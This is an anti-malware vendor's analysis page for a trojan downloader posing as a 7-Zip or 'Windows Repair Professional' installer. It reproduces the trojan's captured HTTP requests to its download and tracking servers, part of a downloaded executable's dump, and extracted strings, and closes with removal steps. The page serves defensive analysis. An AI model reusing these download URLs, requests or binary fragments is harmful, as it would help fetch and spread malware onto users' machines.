SevenZip-apset.exe.b2=ap.c2=sevenzip.s2=0.m2=0.d2=0.t3=dl.u3=hXXp://b.
byteguardoptic.com/de/?q=YWZmaWxpYXRlX2lkPTczNS00MjcyMTMyJmZpbGVzaXplP
TIuNE1iJnB1Ymxpc2hlcklkPTI0NDM3JnByb2R1Y3RfbmFtZT1XaW5kb3dzJTIwUmVwYWl
yJTIwUHJvZmVzc2lvbmFsJTIwKEEmcHJvZHVjdF90aXRsZT1XaW5kb3dzJTIwUmVwYWlyJ
TIwUHJvZmVzc2lvbmFsJTIwKEEmcHJvZHVjdF9kb3dubG9hZF91cmw9aHR0cCUzYSUyZiU
yZmQzcGNjdXAxOXhkYTJ0LmNsb3VkZnJvbnQubmV0JTJmc2V2ZW56aXAtc2V0dXAtcnguZ
XhlJnByb2R1Y3RfZmlsZV9uYW1lPXNldmVuc2V0dXAuZXhlJmluc3RhbGxlcl9maWxlX25
hbWU9c2V0dXA=.n3=sevensetup.exe.b3=rx.c3=sevenzip-1.s3=0.m3=0.d3=0.t
4=dl.u4=hXXp://get.file136desktop.info/DownloadManager/Get?p=638&d=544
&l=461&n=1&productname=sevenzip&d1=4272132&d2=735&dynamicname=Windows%
2520Repair%20Professional%20%28A.n4=setup-1228.exe.b4=ru.c4=
<<< skipped >>>


GET /launch_reb.php?p=sevenzip&tid=4272132&pid=735&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChBbGwgSW4gT25lKSAzLjIuMiArIFBvcnRhYmxlICsgU2VyaWFs&b_typ=pe HTTP/1.0
Host: get.fc-gosh.biz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 179
Connection: close
Date: Thu, 13 Aug 2015 00:45:43 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 017ee4b2e5ba6b7a7dd1443f39b6e832.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 6QMHXEHuHyMgYmFpY2cxVQprTEKUWi9cTaXED_52oB9UA-kWfyWXOA==
s=first..u=hXXp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4
272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All 
In One) 3.2.2 + Portable + Serial..



GET /?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11 HTTP/1.0
Host: get.cp-retr.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 52212
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="cpSetup.exe"
Date: Thu, 13 Aug 2015 00:45:47 GMT
X-Cache: Miss from cloudfront
Via: 1.1 1415e6a9d308119037d1fa89386da72a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: qGMncVdA41NlISK5tz1w3zzoOgUy1l5m5tOFRCo78IYhdCrny4lkfQ==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
..........,...........................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
rc....,...........v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>


POST hXXp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA HTTP/1.1
Host: up.int-cp-234.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Content-Type: application/x-www-form-urlencoded

id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Thu, 13 Aug 2015 00:45:54 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 3abf650c7bf73e47515000bddf3f05c0.cloudfront.net (CloudFront)
X-Amz-Cf-Id: REjTGRmXn_8nncDgoS9GZJ4edoj36PxlfVllu7Meu93cKxV_YMqptg==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "htt
p://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><MET
A HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
;.<TITLE>ERROR: The request could not be satisfied</TITLE>
.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The re
quest could not be satisfied.</H2>.<HR noshade size="1px">
.This distribution is not configured to allow the HTTP request method 
that was used for this request. The distribution supports only cachabl
e requests..<BR clear="all">.<HR noshade size="1px">.<P
RE>.Generated by cloudfront (CloudFront).Request ID: REjTGRmXn_8nnc
DgoS9GZJ4edoj36PxlfVllu7Meu93cKxV_YMqptg==.</PRE>.<ADDRESS>
;.</ADDRESS>.</BODY></HTML>..

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1616:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NojM0TDHJX.exe
tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp
ogram=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
.reloc
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
System.dll
callback%d
KERNEL32.DLL
COMDLG32.dll
IPHLPAPI.DLL
MPR.dll
OLEAUT32.dll
PSAPI.DLL
USERENV.dll
UxTheme.dll
WININET.dll
WINMM.dll
WSOCK32.dll
FtpOpenFileW
hXXp://VVV.usertrust.com1
1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05
hXXp://ocsp.usertrust.com0
hXXps://secure.comodo.net/CPS0C
2hXXp://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
2hXXp://crt.comodoca.com/COMODORSACodeSigningCA.crt0$
hXXp://ocsp.comodoca.com0
[email protected]
"COMODO RSA Certification Authority0
;hXXp://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
/hXXp://crt.comodoca.com/COMODORSAAddTrustCA.crt0$
nsd2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\S
ram=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
l.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
201508130045
hXXp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

%original file name%.exe_1616_rwx_10004000_00001000:

callback%d

NojM0TDHJX.exe_1980:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe"
_downloader-Q4gYjE1gv.exe
instid[appsetupurl]=http://pe-sixi.com/downloadS.php?bu=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=
UyZmQzcGNjdXAxOXhkYTJ0LmNsb3VkZnJvbnQubmV0JTJmc2V2ZW56aXAtc2V0dXAtcnguZXhlJnByb2R1Y3RfZmlsZV9uYW1lPXNldmVuc2V0dXAuZXhlJmluc3RhbGxlcl9maWxlX25hbWU9c2V0dXA=
sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=735&subid2=4272132
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\BgWorker.dll
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\BgWorker.dll
%d/at
key=end
} .rdata
KERNEL32.DLL
nsArray.dll
Join
.reloc
System.dll
callback%d
@.reloc
ButtonEvent.dll
`.reloc
MsgWaitForMultipleObjects
BgWorker.dll
LangDLL.dll
W.vS|
Windows Repair Professional (A Setup
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp
cpSetup.exe
Fbu=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=
19458637
x.exe
staller.com/installer/?iid=324&nsoft=9
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NojM0TDHJX.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp
NojM0TDHJX.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
722076380
2107457
1393165021
1124729953
hXXp://get.cp-retr.xyz/?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11
=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=
iUyZmQzcGNjdXAxOXhkYTJ0LmNsb3VkZnJvbnQubmV0JTJmc2V2ZW56aXAtc2V0dXAtcnguZXhlJnByb2R1Y3RfZmlsZV9uYW1lPXNldmVuc2V0dXAuZXhlJmluc3RhbGxlcl9maWxlX25hbWU9c2V0dXA=
=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=735&subid2=4272132
0.x.exe
Q4gYjE1gv.exe
)-.Yln
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
1.1.1.6
1.0.0.8

NojM0TDHJX.exe_1980_rwx_003D4000_00001000:

callback%d

NojM0TDHJX.exe_1980_rwx_10001000_00007000:

/key=
.text
`.rdata
@.data
.rsrc
@.reloc

cpSetup.exe_568:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp
%Program Files%
\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll
$$\wininit.ini
@.reloc
subid1: %s
subid2: %s
subid3: %s
subid4: %s
subid5: %s
url1: %s
url2: %s
apptitle: %S
appimgurl: %s
appsetupurl: %s
appcmd: %s
apptyurl: %s
appversion: %s
Offer path: %s
Offer retruned: %s
hXXp://
Stub.dll
GetProcessHeap
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
nsx8.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp
cpSetup.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe
:::#222.111 )))
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\nsx4.tmp (1778 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\1119458637 (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\NSISdl.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsArray.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsDialogs.dll (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\BgWorker.dll (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\cpSetup.exe (4805 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\S (179 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NojM0TDHJX.exe (8278 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NSISdl.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IDELG32N\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\00075542.a (1690 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4BSXI3UX\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q3O76FGN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\00074d91.a (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx7.tmp (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GNSBSD4B\desktop.ini (67 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now